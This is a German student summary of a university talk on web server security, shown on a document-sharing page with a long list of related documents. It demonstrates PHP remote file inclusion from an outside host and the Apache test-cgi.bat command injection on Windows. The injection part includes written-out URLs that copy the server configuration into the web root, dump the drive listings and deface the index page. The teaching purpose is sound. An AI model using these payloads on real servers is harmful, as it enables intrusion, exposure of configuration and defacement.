Datenbanken und Netzanbindung



Ähnliche Dokumente
Thomas Theis PHP4. Webserver-Programmierung für Um- und Einsteiger. Galileo Press

Linux-Camp: Linux als Server am Beispiel LAMP

Schritt für Schritt Installationsanleitung LIBRARY iopac auf einem Windows Server 2012 / 2012 R2 (IIS8)

Literatur und Links. Webtechnologien SS 2017 Teil 1/Entwicklung

XAMPP installieren & Kursbeispiel einrichten

Webtechnologien Teil 1: Entwicklungsumgebung(en)

Inhaltsverzeichnis. Einleitung... 11

Es wird eine MySQL Datenbank benötigt, es wird die Tabelle SB_Musikmanager erstellt.

Tobias Wassermann. Sichere Webanwendungen mit PHP

i-net HelpDesk Erste Schritte

Handbuch für Administratoren

TimeMachine. Installation und Konfiguration. Version 1.4. Stand Dokument: installcentos.odt

Temperaturmessung und Bereitstellung der Werte über einen Webserver

Mac OS X Consoliero Teil 14: Webmail Agent unter Mac OS X Server 10.2

Anleitung Formmail- Script für den DA-FormMaker

XAMPP installieren & Kursbeispiel einrichten

TimeMachine. Time CGI. Version 1.5. Stand Dokument: time.odt. Berger EDV Service Tulbeckstr München

Installation Messerli MySQL auf Linux

Xampp-Installation und Konfiguration. Stefan Maihack Dipl. Ing. (FH) Datum:

GSH3EX. NetObjects Fusion 8 basics plus. Helga Heumann Frederique Thalmayr

Inbetriebnahme einer lokal installierten Demoversion von VuFind

Web-basierte Anwendungssysteme PHP-Einführung

Literatur und Links. Webtechnologien SS 2018 Teil 1/Entwicklung

Webtechnologien Teil 1: Entwicklungsumgebung

Mapbender-Installation

Der Rumpf. Titel Seite 3

TimeMachine. Installation und Konfiguration. Version 1.4. Stand Dokument: install.odt. Berger EDV Service Tulbeckstr.

Internet. HTML Programmierung Grundlagen HTML Programmierung für Fortgeschrittene CGI Programmierung PHP Programmierung Programmieren mit JavaScript

Whitepaper. Produkt: List & Label 16. List & Label 16 unter Linux/Wine. combit GmbH Untere Laube Konstanz

Meine Fakultät. Alumni-Portal HTML-Seiten im Portal Seite 1 von 8

Inhalt. Vorwort 13. Einleitung 15. Für wen ist dieses Buch gedacht? 15 Zum Aufbau des Buchs Installation und erste Schritte 17

Die Kassa. Mobile Geräte (Handy)

Literatur und Links. Webtechnologien WS 2015/16 Teil 1/Entwicklung

In MAMP ein neues WordPress-Projekt anlegen. 1. MAMP: Server starten. 1. Server starten

Um Ihren neuen»counter«(besucherzähler) auf einer Webseite zu installieren, benötigen Sie folgenden HTML-Code:

Raspberry als Cloud Server (Next Cloud / Owncloud)

1. Installation und deutsche Sprach-Einstellung

Installation und Konfiguration

Themen. Apache Webserver Konfiguration. Verzeichnisse für Web-Applikationen. Server Side Includes

Grundlagen Internet-Technologien INF3171

PHP eine Einführung. Dipl.-Inf. Frank Hofmann. 18. November Potsdam

LAMP HowTo (Linux Apache MySQL PHP) Zugriff per SSH auf den Server. Servername: gyko.no-ip.info (Lokal: )

- Installation. Systemvoraussetzungen für opensuse Linux. conversations installieren conversations wird als TGZ-Archiv mit dem Namen

1. Übung IT-Management HTML, CSS und JavaScript Teil 2. Einführung, , PC Pool

Vorwort: Technische Voraussetzungen: Installation: IP Logger PRO Version 2, Manual Revision 1.071, September 2009

Legen Sie nun dieses Verzeichnis mit dem Namen "joomla" hier an: C:xampphtdocs.

Inhaltsverzeichnis Abbildungsverzeichnis

Scan Engine - Nutzung der Inventory Skripte

4 Das FrontPage-Web. Ziele dieses Kapitels. $ Sie lernen die Struktur eines Webs kennen. $ Sie können Webs verschachteln.

Web Space Anbieter im Internet:

Thema: Umgang mit ISO-Images

Tel Fax

Trainingsmanagement Gutschein Management. Beschreibung

Microsoft Visual Studio Code mit RPG und IceBreak

Das PostNuke Kompendium

HTML Formulare. Benutzerschnittstelle für interaktive Webseiten

Formulare mit HTML. Beispiele. Beispiele & Nutzen. Web. Fach: Klasse: BW2. Datum: (Freitag) Agenda zu HTML und PHP

Wie funktioniert das WWW? Sicher im WWW

Hochschule Darmstadt Fachbereich Informatik

Konzept eines Datenbankprototypen Folie 1 Daniel Gander / Gerhard Schrotter

Online-News Ausgabe 12, Juli 2000 Seite 56

Internet-Technologien

MASCH CM Studio Installation auf einem Linux Server. Für den schnellen Einstieg! (am Beispiel von Suse Linux Enterprise Server 11.

Domino und PHP EC 2013 Track 2 Session 7

Anleitung zur Erstellung der Internetseiten

André Maurer Wirtschaftsinformatik FH 3.5 Fachhochschule Solothurn, Olten

Eine Untersuchung der Funktionen des Apache Wicket Webframeworks

Eine Linkliste in Word anlegen und zur Startseite des Browsers machen

Computeria Dietikon 28. April Hans-Ueli Preisig, Computeria-Dietikon

Indiware Unterrichtsplaner

Web-Modul in Lightroom 5. Stefan Sporrer

Das Konfigurations- Paket (KIT_V8i_Ext_Konfiguration.zip) beinhaltet folgende Daten:

Leitfaden für die Installation des Content Management System (CMS) Joomla! auf za-internet Webservern. Die Joomla! Installation

PG5 Starter Training PG5 Core und Webeditor 5 Daniel Ernst DE

Installation von Zope, Plone, exam auf OSS

Typo3. Thomas Lüthi. Beitrag zur "CMS-Battle" vom 7. Juni 2010 Campus Bern.

Transkript:

Datenbanken und Netzanbindung Zusammenfassung von Michael Reiher zum Vortrag Webserver und Sicherheit. Meine Ausarbeitung befasst sicht sich mit Möglichkeiten eines Angriffs auf einen Webserver. Seite 1 von 8

Die Sicherheit spielt eine große Rolle, da in der heutigen Zeit das Image einer Firma häufig von ihrem Erscheinungsbild abhängt. Ihr Auftritt im Internet ist somit ein wichtiger Teil der gesamten Firmendarstellung. Sollten die unten beschriebenen Angriffe auf einen Webserver erfolgen, kann dies sehr schädlich für das Image der Firma sein. Beispiel 1: Im ersten Beispiel möchten wir zeigen, wie leicht es möglich ist, fremden Quellcode in eine mit PHP generierte Internetseite zu bringen. Darstellung der Internetseite im Browser Wie unten in der Statusleiste angezeigt, wird die aufzurufende Seite als Variable übergeben (dyn_webseite.php?content=news, für den Aufruf der News Seite). Seite 2 von 8

Quellcode der dyn_webseite.php Datei Diese Internetseite beinhaltet eine Tabelle mit zwei Zellen. In der linken Zelle befindet sich das Menu mit den zugehörigen Verlinkungen auf die jeweiligen Unterseiten. Mit Hilfe des include Befehls von PHP wird in der rechten Zelle nach dem auswählen des Menupunktes die Unterseite angezeigt. Seite 3 von 8

Wenn wir uns nun den HTML Quellcode einmal genauer ansehen, wird der Inhalt der rechten Tabellenzelle mit einem include Befehl eingebunden. Wenn also, wie in unserem Beispiel oben, "content=news" übergeben wird, so wird "news.php" geladen. Bis hierhin ist noch alles so verlaufen, wie sich das der Programmierer der Seiten gedacht hat. Jedoch wurde übersehen, dass auch externe Dateien von anderen Servern durch einen kleinen Trick eingebunden werden können. Darstellung der Internetseite im Browser mit Inhalt eines externen Servers Es ist also mit dem Aufruf " content=http://aachen.no-ip.org/hacker_script" über die Adressleiste im Browser möglich Seiten von anderen Servern einzubinden. Quellcode der hacker_script.php Datei Die Datei auf dem externen Server hat nun durch das include die Rechte der lokal abgelegten Dateien. Seite 4 von 8

Mit Hilfe eines weiteren PHP Scriptes ist es also z.b. möglich, sich durch ganze Verzeichnisse zu browsen. Darstellung der Internetseite im Browser mit einer Datei eines externen Servers Quellcode der hacker_2.php Datei Der Fehler war, dass man der Korrektheit der zu übergebenden Variablen zu großes Vertrauen geschenkt hat. Seite 5 von 8

Beispiel 2: Internetseite auf einem Apache 1.3.23 Webserver Im zweiten Beispiel nutzen wir eine Sicherheitslücke im Apache 1.3.23 und 2.0.x. unter Windows. Diese beiden Apache Typen haben im "cgi-bin" Verzeichnis ein cgi Test Script namens "/cgi-bin/test-cgi.bat". Übergibt man in einem fehlerhaften Aufruf Werte, so kann man beliebige aufrufe auf dem Webserver starten. Hier einige Aufrufbeispiele: 1) http://192.168.0.104/cgi-bin/test-cgi.bat? copy+..\conf\httpd.conf+..\htdocs\httpd.conf Dieser einfache Aufruf über die Adressleiste des Browsers kopiert die httpd.conf (Konfigurationsdatei des Apache) ins "htdocs" (Web Root Directory). An dieser Stelle kann man sich die gesamte Konfiguration anschauen oder downloaden. 2) http://192.168.0.104/cgi-bin/test-cgi.bat? dir+c:+d:+>..\htdocs\dir.txt Dieser Aufruf liest das Verzeichnis von der Festplatte C: und D: aus und speichert dieses in die Textdatei "dir.txt" im Verzeichnis "htdocs" (Web Root Directory). Seite 6 von 8

Adressleiste eines Webbrowsers mit Übergabe von Parametern an das fehlerhafte cgi test Script Darstellung der vom Angreifen erzeugten Textdatei 3) http://192.168.0.104/cgi-bin/test-cgi.bat? echo+------hacked by Orkomike ------ Vortrag Webserver - FH Aachen+>>+..\htdocs\index.html Dieser Aufruf ändert den Inhalt der "index.html" beliebig um, so dass wiederum das Firmenimage geschädigt werden kann. Seite 7 von 8

Darstellung der "Gehackten" Internetseite im Browser Literaturverzeichnis: Das Anti-Hacker-Buch, mitp Verlag Hack Proofing Linux, Syngress Verlag http://www.php.net http://neworder.box.sk http://alesoft.webcindario.com/utilidades_hacker.htm http://www.computec.ch/software/webserver/index.html Seite 8 von 8

2026 © DocPlayer.org Datenschutzbestimmungen | Nutzungsbedingungen | Feedback